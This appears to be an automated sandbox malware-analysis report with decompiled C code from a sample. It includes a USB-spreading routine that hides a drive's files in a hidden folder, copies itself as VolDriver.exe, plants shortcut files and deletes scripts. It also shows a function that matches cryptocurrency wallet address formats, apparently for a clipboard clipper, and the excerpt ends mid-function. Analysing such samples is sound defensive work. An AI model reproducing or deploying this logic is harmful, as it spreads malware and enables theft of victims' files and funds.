                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040D39E
                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,'b@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040D3E5
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000003E8), ref: 0040D3F5
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,'b@,00000000,00000000,00000000), ref: 0040D410
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D42A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                                                                                                                                                                                                                    • String ID: $'b@$D$open
                                                                                                                                                                                                                                                                                    • API String ID: 2222793131-3177583149
                                                                                                                                                                                                                                                                                    • Opcode ID: d69509e6999794d924fcff9b845599a7eb41f28983b1475a5e279ebf92cb692e
                                                                                                                                                                                                                                                                                    • Instruction ID: b11808ad886c3be21141a941b9f16766042708721ad172ccf90be75e59fbd376
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d69509e6999794d924fcff9b845599a7eb41f28983b1475a5e279ebf92cb692e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E211FE71E4430CBBEB14DF94DC46BDE7774AB18700F20412AFA09BA2C0D6B55A448B59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 85 404fc0-404fd5 _chkstk 86 404fd7-404fd9 85->86 87 404fde-405090 wsprintfW * 5 PathFileExistsW 85->87 88 405495-405498 86->88 89 405092-4050b3 call 40d180 87->89 90 4050d4-4050e3 PathFileExistsW 87->90 89->90 99 4050b5-4050ce SetFileAttributesW DeleteFileW 89->99 91 405150-40515f PathFileExistsW 90->91 92 4050e5-4050f4 PathFileExistsW 90->92 96 405161-405167 91->96 97 4051a6-4051c7 FindFirstFileW 91->97 94 4050f6-405107 CreateDirectoryW 92->94 95 405118-405127 PathFileExistsW 92->95 94->95 102 405109-405112 SetFileAttributesW 94->102 95->91 103 405129-40513f CopyFileW 95->103 104 405181-405194 call 404d70 96->104 105 405169-40517f call 404d70 96->105 100 4051cd-405285 97->100 101 40548f 97->101 99->90 106 40528f-4052a3 lstrcmpW 100->106 101->88 102->95 103->91 107 405141-40514a SetFileAttributesW 103->107 114 405197-4051a0 SetFileAttributesW 104->114 105->114 110 4052a5-4052b9 lstrcmpW 106->110 111 4052bb 106->111 107->91 110->111 115 4052c0-4052d1 110->115 116 405466-40547c FindNextFileW 111->116 114->97 117 4052e2-4052e9 115->117 118 4052d3-4052dc 115->118 116->106 119 405482-405489 FindClose 116->119 120 405317-405320 117->120 121 4052eb-405308 lstrcmpiW 117->121 118->117 119->101 124 405322 120->124 125 405327-405338 120->125 122 40530a 121->122 123 40530c-405313 121->123 122->118 123->120 124->116 126 405349-405350 125->126 127 4053c0-4053c9 126->127 128 405352-40536f PathMatchSpecW 126->128 131 4053d0-4053df PathFileExistsW 127->131 132 4053cb 127->132 129 405371 128->129 130 405373-4053b9 wsprintfW SetFileAttributesW DeleteFileW 128->130 129->126 130->127 134 4053e1 131->134 135 4053e6-405436 wsprintfW * 2 131->135 132->116 134->116 136 405450-405460 MoveFileExW 135->136 137 405438-40544e call 404e80 135->137 136->116 137->116
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404FC0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				short _v1044;
                                                                                                                                                                                                                                                                                    				short _v1564;
                                                                                                                                                                                                                                                                                    				short _v2084;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2088;
                                                                                                                                                                                                                                                                                    				short _v2612;
                                                                                                                                                                                                                                                                                    				short _v3132;
                                                                                                                                                                                                                                                                                    				char _v3133;
                                                                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAW _v3732;
                                                                                                                                                                                                                                                                                    				short _v4252;
                                                                                                                                                                                                                                                                                    				void* _v4256;
                                                                                                                                                                                                                                                                                    				short _v4780;
                                                                                                                                                                                                                                                                                    				intOrPtr _v4784;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4788;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4792;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4796;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4800;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4804;
                                                                                                                                                                                                                                                                                    				intOrPtr _v4808;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4812;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4816;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4820;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4824;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4828;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4832;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4836;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4840;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4844;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4848;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4852;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4856;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4860;
                                                                                                                                                                                                                                                                                    				signed char _v4861;
                                                                                                                                                                                                                                                                                    				signed char _v4862;
                                                                                                                                                                                                                                                                                    				signed int _v4868;
                                                                                                                                                                                                                                                                                    				signed int _v4872;
                                                                                                                                                                                                                                                                                    				intOrPtr _t167;
                                                                                                                                                                                                                                                                                    				intOrPtr _t195;
                                                                                                                                                                                                                                                                                    				void* _t218;
                                                                                                                                                                                                                                                                                    				void* _t219;
                                                                                                                                                                                                                                                                                    				void* _t224;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0040EE0A();
                                                                                                                                                                                                                                                                                    				if((_a12 & 0x00080000) != 0) {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v2088 = 0x415124;
                                                                                                                                                                                                                                                                                    				_v3133 = 0;
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                                    				_t224 = _t219 + 0x48;
                                                                                                                                                                                                                                                                                    				if(PathFileExistsW( &_v4780) != 0) {
                                                                                                                                                                                                                                                                                    					_t167 = E0040D180( &_v4780);
                                                                                                                                                                                                                                                                                    					_t224 = _t224 + 4;
                                                                                                                                                                                                                                                                                    					_v4784 = _t167;
                                                                                                                                                                                                                                                                                    					_t195 =  *0x4163b8; // 0x0
                                                                                                                                                                                                                                                                                    					if(_t195 != _v4784) {
                                                                                                                                                                                                                                                                                    						SetFileAttributesW( &_v4780, 0x80);
                                                                                                                                                                                                                                                                                    						DeleteFileW( &_v4780);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(PathFileExistsW( &_v4780) == 0) {
                                                                                                                                                                                                                                                                                    					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                                                                                                                                                                                                                    						SetFileAttributesW( &_v4252, 2);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(0x4163c0,  &_v4780, 0) != 0) {
                                                                                                                                                                                                                                                                                    						SetFileAttributesW( &_v4780, 2);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(PathFileExistsW( &_v2612) == 0) {
                                                                                                                                                                                                                                                                                    					if((_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    						E00404D70( &_v2612, L"shell32.dll", 8);
                                                                                                                                                                                                                                                                                    						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						E00404D70( &_v2612, L"shell32.dll", 9);
                                                                                                                                                                                                                                                                                    						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					SetFileAttributesW( &_v2612, 1);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                                                                                                                                                                                                                    				if(_v4256 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					L45:
                                                                                                                                                                                                                                                                                    					return _v3133;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v4860 = L"*.lnk";
                                                                                                                                                                                                                                                                                    					_v4856 = L"*.vbs";
                                                                                                                                                                                                                                                                                    					_v4852 = L"*.js";
                                                                                                                                                                                                                                                                                    					_v4848 = L"*.scr";
                                                                                                                                                                                                                                                                                    					_v4844 = L"*.com";
                                                                                                                                                                                                                                                                                    					_v4840 = L"*.jse";
                                                                                                                                                                                                                                                                                    					_v4836 = L"*.cmd";
                                                                                                                                                                                                                                                                                    					_v4832 = L"*.pif";
                                                                                                                                                                                                                                                                                    					_v4828 = L"*.jar";
                                                                                                                                                                                                                                                                                    					_v4824 = L"*.dll";
                                                                                                                                                                                                                                                                                    					_v4820 = L"*.vbe";
                                                                                                                                                                                                                                                                                    					_v4816 = L"*.bat";
                                                                                                                                                                                                                                                                                    					_v4812 = L"*.inf";
                                                                                                                                                                                                                                                                                    					_v4808 = _v2088;
                                                                                                                                                                                                                                                                                    					_v4804 =  &_v1564;
                                                                                                                                                                                                                                                                                    					_v4800 = L"Thumbs.db";
                                                                                                                                                                                                                                                                                    					_v4796 = L"$RECYCLE.BIN";
                                                                                                                                                                                                                                                                                    					_v4792 = L"desktop.ini";
                                                                                                                                                                                                                                                                                    					_v4788 = L"System Volume Information";
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                                    							_v4862 = 0;
                                                                                                                                                                                                                                                                                    							_v4868 = 0;
                                                                                                                                                                                                                                                                                    							while(_v4868 < 6) {
                                                                                                                                                                                                                                                                                    								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                                                                                                                                                                                                                    									_v4862 = 1;
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_v4868 = _v4868 + 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if((_v4862 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    								_v4861 = 0;
                                                                                                                                                                                                                                                                                    								_v4872 = 0;
                                                                                                                                                                                                                                                                                    								while(_v4872 < 0xd) {
                                                                                                                                                                                                                                                                                    									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                                                                                                                                                                                                                    										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                                    										_t224 = _t224 + 0x10;
                                                                                                                                                                                                                                                                                    										SetFileAttributesW( &_v2084, 0x80);
                                                                                                                                                                                                                                                                                    										DeleteFileW( &_v2084);
                                                                                                                                                                                                                                                                                    										_v4861 = 1;
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v4872 = _v4872 + 1;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								if((_v4861 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    									if(PathFileExistsW( &_v4252) != 0) {
                                                                                                                                                                                                                                                                                    										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                                    										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                                    										_t224 = _t224 + 0x24;
                                                                                                                                                                                                                                                                                    										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                    											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											E00404E80( &_v3132,  &_v524);
                                                                                                                                                                                                                                                                                    											_t224 = _t224 + 8;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L43:
                                                                                                                                                                                                                                                                                    					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                                                                                                                                                                                                                    					FindClose(_v4256);
                                                                                                                                                                                                                                                                                    					goto L45;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}












































                                                                                                                                                                                                                                                                                    0x00404fc8
                                                                                                                                                                                                                                                                                    0x00404fd5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404fd7
                                                                                                                                                                                                                                                                                    0x00404fde
                                                                                                                                                                                                                                                                                    0x00404fe8
                                                                                                                                                                                                                                                                                    0x00404fff
                                                                                                                                                                                                                                                                                    0x0040501f
                                                                                                                                                                                                                                                                                    0x0040503f
                                                                                                                                                                                                                                                                                    0x0040505f
                                                                                                                                                                                                                                                                                    0x00405078
                                                                                                                                                                                                                                                                                    0x0040507e
                                                                                                                                                                                                                                                                                    0x00405090
                                                                                                                                                                                                                                                                                    0x00405099
                                                                                                                                                                                                                                                                                    0x0040509e
                                                                                                                                                                                                                                                                                    0x004050a1
                                                                                                                                                                                                                                                                                    0x004050a7
                                                                                                                                                                                                                                                                                    0x004050b3
                                                                                                                                                                                                                                                                                    0x004050c1
                                                                                                                                                                                                                                                                                    0x004050ce
                                                                                                                                                                                                                                                                                    0x004050ce
                                                                                                                                                                                                                                                                                    0x004050b3
                                                                                                                                                                                                                                                                                    0x004050e3
                                                                                                                                                                                                                                                                                    0x004050f4
                                                                                                                                                                                                                                                                                    0x00405112
                                                                                                                                                                                                                                                                                    0x00405112
                                                                                                                                                                                                                                                                                    0x00405127
                                                                                                                                                                                                                                                                                    0x0040514a
                                                                                                                                                                                                                                                                                    0x0040514a
                                                                                                                                                                                                                                                                                    0x00405127
                                                                                                                                                                                                                                                                                    0x0040515f
                                                                                                                                                                                                                                                                                    0x00405167
                                                                                                                                                                                                                                                                                    0x0040518f
                                                                                                                                                                                                                                                                                    0x00405194
                                                                                                                                                                                                                                                                                    0x00405169
                                                                                                                                                                                                                                                                                    0x00405177
                                                                                                                                                                                                                                                                                    0x0040517c
                                                                                                                                                                                                                                                                                    0x0040517c
                                                                                                                                                                                                                                                                                    0x004051a0
                                                                                                                                                                                                                                                                                    0x004051a0
                                                                                                                                                                                                                                                                                    0x004051ba
                                                                                                                                                                                                                                                                                    0x004051c7
                                                                                                                                                                                                                                                                                    0x0040548f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004051cd
                                                                                                                                                                                                                                                                                    0x004051cd
                                                                                                                                                                                                                                                                                    0x004051d7
                                                                                                                                                                                                                                                                                    0x004051e1
                                                                                                                                                                                                                                                                                    0x004051eb
                                                                                                                                                                                                                                                                                    0x004051f5
                                                                                                                                                                                                                                                                                    0x004051ff
                                                                                                                                                                                                                                                                                    0x00405209
                                                                                                                                                                                                                                                                                    0x00405213
                                                                                                                                                                                                                                                                                    0x0040521d
                                                                                                                                                                                                                                                                                    0x00405227
                                                                                                                                                                                                                                                                                    0x00405231
                                                                                                                                                                                                                                                                                    0x0040523b
                                                                                                                                                                                                                                                                                    0x00405245
                                                                                                                                                                                                                                                                                    0x00405255
                                                                                                                                                                                                                                                                                    0x00405261
                                                                                                                                                                                                                                                                                    0x00405267
                                                                                                                                                                                                                                                                                    0x00405271
                                                                                                                                                                                                                                                                                    0x0040527b
                                                                                                                                                                                                                                                                                    0x00405285
                                                                                                                                                                                                                                                                                    0x0040528f
                                                                                                                                                                                                                                                                                    0x004052a3
                                                                                                                                                                                                                                                                                    0x004052c0
                                                                                                                                                                                                                                                                                    0x004052c7
                                                                                                                                                                                                                                                                                    0x004052e2
                                                                                                                                                                                                                                                                                    0x00405308
                                                                                                                                                                                                                                                                                    0x0040530c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040530c
                                                                                                                                                                                                                                                                                    0x004052dc
                                                                                                                                                                                                                                                                                    0x004052dc
                                                                                                                                                                                                                                                                                    0x00405320
                                                                                                                                                                                                                                                                                    0x00405327
                                                                                                                                                                                                                                                                                    0x0040532e
                                                                                                                                                                                                                                                                                    0x00405349
                                                                                                                                                                                                                                                                                    0x0040536f
                                                                                                                                                                                                                                                                                    0x0040538a
                                                                                                                                                                                                                                                                                    0x00405390
                                                                                                                                                                                                                                                                                    0x0040539f
                                                                                                                                                                                                                                                                                    0x004053ac
                                                                                                                                                                                                                                                                                    0x004053b2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004053b2
                                                                                                                                                                                                                                                                                    0x00405343
                                                                                                                                                                                                                                                                                    0x00405343
                                                                                                                                                                                                                                                                                    0x004053c9
                                                                                                                                                                                                                                                                                    0x004053df
                                                                                                                                                                                                                                                                                    0x004053fd
                                                                                                                                                                                                                                                                                    0x00405424
                                                                                                                                                                                                                                                                                    0x0040542a
                                                                                                                                                                                                                                                                                    0x00405436
                                                                                                                                                                                                                                                                                    0x00405460
                                                                                                                                                                                                                                                                                    0x00405438
                                                                                                                                                                                                                                                                                    0x00405446
                                                                                                                                                                                                                                                                                    0x0040544b
                                                                                                                                                                                                                                                                                    0x0040544b
                                                                                                                                                                                                                                                                                    0x00405436
                                                                                                                                                                                                                                                                                    0x004053df
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004053c9
                                                                                                                                                                                                                                                                                    0x00405322
                                                                                                                                                                                                                                                                                    0x00405466
                                                                                                                                                                                                                                                                                    0x0040547a
                                                                                                                                                                                                                                                                                    0x00405489
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405489

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _chkstk.NTDLL(?,00405610,?,?,?), ref: 00404FC8
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404FFF
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040501F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040503F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040505F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00405078
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00405088
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004050C1
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004050DB
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004050EC
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 004050FF
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00405112
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 0040511F
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00405137
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 0040514A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                                                                                                                                                                                                                    • String ID: $QA$%s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 3833403615-723921974
                                                                                                                                                                                                                                                                                    • Opcode ID: bc23619f8dc30859a07966784ca3ed239acb01018f2188f41b04a5a3b5a0ba6e
                                                                                                                                                                                                                                                                                    • Instruction ID: f358d4f12602216a8cf7219611423f3e74dfa0c58bc439e6418ed54077a909fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc23619f8dc30859a07966784ca3ed239acb01018f2188f41b04a5a3b5a0ba6e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DD18175900218ABCB20DF60DC48FEA77B8FF44305F0485EAE609A6291D7B99BD4CF59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                                                                                                                                    			E00403480(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				WCHAR* _v12;
                                                                                                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				signed char _v21;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                                                    				signed int _t346;
                                                                                                                                                                                                                                                                                    				signed int _t347;
                                                                                                                                                                                                                                                                                    				void* _t567;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v21 = 1;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = lstrlenW(_a4);
                                                                                                                                                                                                                                                                                    				if(( *_a4 & 0x0000ffff) != 0x30 && ( *_a4 & 0x0000ffff) != 0x54 && ( *_a4 & 0x0000ffff) != 0x33 && ( *_a4 & 0x0000ffff) != 0x74 && ( *_a4 & 0x0000ffff) != 0x62 && ( *_a4 & 0x0000ffff) != 0x31 && ( *_a4 & 0x0000ffff) != 0x58 && ( *_a4 & 0x0000ffff) != 0x44 && ( *_a4 & 0x0000ffff) != 0x4c && ( *_a4 & 0x0000ffff) != 0x72 && ( *_a4 & 0x0000ffff) != 0x68 && ( *_a4 & 0x0000ffff) != 0x51 && ( *_a4 & 0x0000ffff) != 0x52 && ( *_a4 & 0x0000ffff) != 0x4e && ( *_a4 & 0x0000ffff) != 0x6e && ( *_a4 & 0x0000ffff) != 0x41 && ( *_a4 & 0x0000ffff) != 0x6c && ( *_a4 & 0x0000ffff) != 0x7a && ( *_a4 & 0x0000ffff) != 0x71 && ( *_a4 & 0x0000ffff) != 0x63 && ( *_a4 & 0x0000ffff) != 0x34 && ( *_a4 & 0x0000ffff) != 0x38 && ( *_a4 & 0x0000ffff) != 0x53 && ( *_a4 & 0x0000ffff) != 0x61 && ( *_a4 & 0x0000ffff) != 0x6b && ( *_a4 & 0x0000ffff) != 0x69 && ( *_a4 & 0x0000ffff) != 0x66 && ( *_a4 & 0x0000ffff) != 0x65 && ( *_a4 & 0x0000ffff) != 0x6f && ( *_a4 & 0x0000ffff) != 0x47 && ( *_a4 & 0x0000ffff) != 0x45 && ( *_a4 & 0x0000ffff) != 0x55 && ( *_a4 & 0x0000ffff) != 0x42) {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(( *_a4 & 0x0000ffff) != 0x30) {
                                                                                                                                                                                                                                                                                    					if(( *_a4 & 0x0000ffff) == 0x31 || ( *_a4 & 0x0000ffff) == 0x33) {
                                                                                                                                                                                                                                                                                    						if(_v8 < 0x19 || _v8 > 0x23) {
                                                                                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						if(( *_a4 & 0x0000ffff) != 0x34) {
                                                                                                                                                                                                                                                                                    							if(( *_a4 & 0x0000ffff) != 0x4c) {
                                                                                                                                                                                                                                                                                    								if(( *_a4 & 0x0000ffff) != 0x72) {
                                                                                                                                                                                                                                                                                    									if(( *_a4 & 0x0000ffff) != 0x65) {
                                                                                                                                                                                                                                                                                    										if(( *_a4 & 0x0000ffff) != 0x6e) {
                                                                                                                                                                                                                                                                                    											if(StrStrW(_a4, L"bitcoincash:") == 0) {
                                                                                                                                                                                                                                                                                    												if(StrStrW(_a4, L"cosmos") == 0) {
                                                                                                                                                                                                                                                                                    													if(StrStrW(_a4, L"addr") == 0) {
                                                                                                                                                                                                                                                                                    														if(( *_a4 & 0x0000ffff) != 0x47) {
                                                                                                                                                                                                                                                                                    															if(( *_a4 & 0x0000ffff) != 0x45) {
                                                                                                                                                                                                                                                                                    																if(( *_a4 & 0x0000ffff) != 0x55) {
                                                                                                                                                                                                                                                                                    																	if(( *_a4 & 0x0000ffff) != 0x42) {
                                                                                                                                                                                                                                                                                    																		if(_v8 < 0x15 || _v8 > 0x38) {
                                                                                                                                                                                                                                                                                    																			return 0;
                                                                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                                                                    																			goto L107;
                                                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                                                    																	if(_v8 < 9 || _v8 > 0x3c) {
                                                                                                                                                                                                                                                                                    																		return 0;
                                                                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                                                                    																		goto L107;
                                                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v8 == 9) {
                                                                                                                                                                                                                                                                                    																	goto L107;
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																return 0;
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    															if(_v8 == 0x30) {
                                                                                                                                                                                                                                                                                    																_v21 = 0;
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    															if(_v8 < 9 || _v8 > 0x30) {
                                                                                                                                                                                                                                                                                    																return 0;
                                                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                                                    																goto L107;
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    														if(_v8 < 9 || _v8 > 0x3c) {
                                                                                                                                                                                                                                                                                    															return 0;
                                                                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                                                                    															goto L107;
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    													}
